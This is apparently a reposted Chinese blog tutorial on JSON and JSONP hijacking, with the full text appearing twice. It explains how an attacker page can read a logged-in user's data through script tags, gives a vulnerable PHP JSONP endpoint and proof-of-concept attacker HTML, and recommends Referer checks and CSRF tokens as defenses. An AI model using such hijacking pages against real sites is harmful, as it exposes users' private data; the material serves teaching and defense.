如何有效防范并解决JSON和JSONP劫持问题?
- 内容介绍
- 文章标签
- 相关推荐
本文共计765个文字,预计阅读时间需要4分钟。
JSON劫持是一种攻击方式,其过程类似于CSRF(跨站请求伪造),但并非CSRF。它只涉及发送HTTP请求,但其目的是获取敏感数据。一些Web应用会将敏感数据以JSON格式返回。
json劫持
json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送www.test.com/userinfo
攻击者可以在自己的虚假页面中,加入如下标签:
<script src="www.test.com/userinfo"></script>
如果当前浏览器已经登录了www.test.com,并且cookie未过期,然后访问了攻击者的虚假页面,那么该页面就可以拿到json形式的用户敏感信息,因为script标签会自动解析json数据,生成对应的js对象。然后再通过
Object.prototype.__defineSetter__
这个函数来触发自己的恶意代码。
但是这个函数在当前的新版本chrome和firefox中都已经失效了。
jsonp劫持
jsonp是一个非官方的协议,利用script元素的开放策略,网页可以得到从其他来源动态产生的json数据,因此可以用来实现跨域。(关于JSONP可以参考我的博文:www.jb51.net/article/31167.htm)
web程序如果通过这种方式跨域之后,攻击者完全可以在自己的虚假页面中发起恶意的jsonp请求,这就引来了安全问题。比如:
<script> function useUserInfo(v){ alert(v.username); } </script> <script src="www.test.com/userinfo?callback=useUserInfo"></script>
如果服务器端的userinfo接口支持jsonp,那就会使虚假页面成功执行useUserInfo函数,从而导致安全问题。
解决方法
其实json劫持和jsonp劫持属于CSRF( Cross-site request forgery 跨站请求伪造)的攻击范畴,所以解决的方法和解决csrf的方法一样。
1、验证 HTTP Referer 头信息;
2、在请求中添加 csrfToken 并在后端进行验证;
关于CSRF攻击可以参考我的博文:www.jb51.net/article/157550.htm
PS:JSONP劫持漏洞实例
getUser.php
<?php header('Content-type: application/json'); $jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名 //json数据 //$json_data = '["id","user"]'; $json_data='({"id":"1","name":"Aaron"})'; echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据 ?>
Payload利用:
客户端实现 callbackFunction 函数
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>JSONP劫持测试</title> </head> <body> <script type="text/javascript"> function callbackFunction(result) { alert(result.name); } </script> <script type="text/javascript" src="127.0.0.1/test/getUser.php?jsoncallback=callbackFunction"></script> </body> </html>
jQuery 使用 JSONP
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>JSONP劫持测试</title> <script src="cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script> </head> <body> <div id="divCustomers"></div> <script type="text/javascript"> $.getJSON("127.0.0.1/test/getUser.php?jsoncallback=?", function(getUsers){ alert(getUsers.name); }); </script> </body> </html>
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持自由互联。权声明:本文为博主原创文章,转载请附上博文链接!
本文共计765个文字,预计阅读时间需要4分钟。
JSON劫持是一种攻击方式,其过程类似于CSRF(跨站请求伪造),但并非CSRF。它只涉及发送HTTP请求,但其目的是获取敏感数据。一些Web应用会将敏感数据以JSON格式返回。
json劫持
json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送www.test.com/userinfo
攻击者可以在自己的虚假页面中,加入如下标签:
<script src="www.test.com/userinfo"></script>
如果当前浏览器已经登录了www.test.com,并且cookie未过期,然后访问了攻击者的虚假页面,那么该页面就可以拿到json形式的用户敏感信息,因为script标签会自动解析json数据,生成对应的js对象。然后再通过
Object.prototype.__defineSetter__
这个函数来触发自己的恶意代码。
但是这个函数在当前的新版本chrome和firefox中都已经失效了。
jsonp劫持
jsonp是一个非官方的协议,利用script元素的开放策略,网页可以得到从其他来源动态产生的json数据,因此可以用来实现跨域。(关于JSONP可以参考我的博文:www.jb51.net/article/31167.htm)
web程序如果通过这种方式跨域之后,攻击者完全可以在自己的虚假页面中发起恶意的jsonp请求,这就引来了安全问题。比如:
<script> function useUserInfo(v){ alert(v.username); } </script> <script src="www.test.com/userinfo?callback=useUserInfo"></script>
如果服务器端的userinfo接口支持jsonp,那就会使虚假页面成功执行useUserInfo函数,从而导致安全问题。
解决方法
其实json劫持和jsonp劫持属于CSRF( Cross-site request forgery 跨站请求伪造)的攻击范畴,所以解决的方法和解决csrf的方法一样。
1、验证 HTTP Referer 头信息;
2、在请求中添加 csrfToken 并在后端进行验证;
关于CSRF攻击可以参考我的博文:www.jb51.net/article/157550.htm
PS:JSONP劫持漏洞实例
getUser.php
<?php header('Content-type: application/json'); $jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名 //json数据 //$json_data = '["id","user"]'; $json_data='({"id":"1","name":"Aaron"})'; echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据 ?>
Payload利用:
客户端实现 callbackFunction 函数
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>JSONP劫持测试</title> </head> <body> <script type="text/javascript"> function callbackFunction(result) { alert(result.name); } </script> <script type="text/javascript" src="127.0.0.1/test/getUser.php?jsoncallback=callbackFunction"></script> </body> </html>
jQuery 使用 JSONP
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>JSONP劫持测试</title> <script src="cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script> </head> <body> <div id="divCustomers"></div> <script type="text/javascript"> $.getJSON("127.0.0.1/test/getUser.php?jsoncallback=?", function(getUsers){ alert(getUsers.name); }); </script> </body> </html>
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持自由互联。权声明:本文为博主原创文章,转载请附上博文链接!

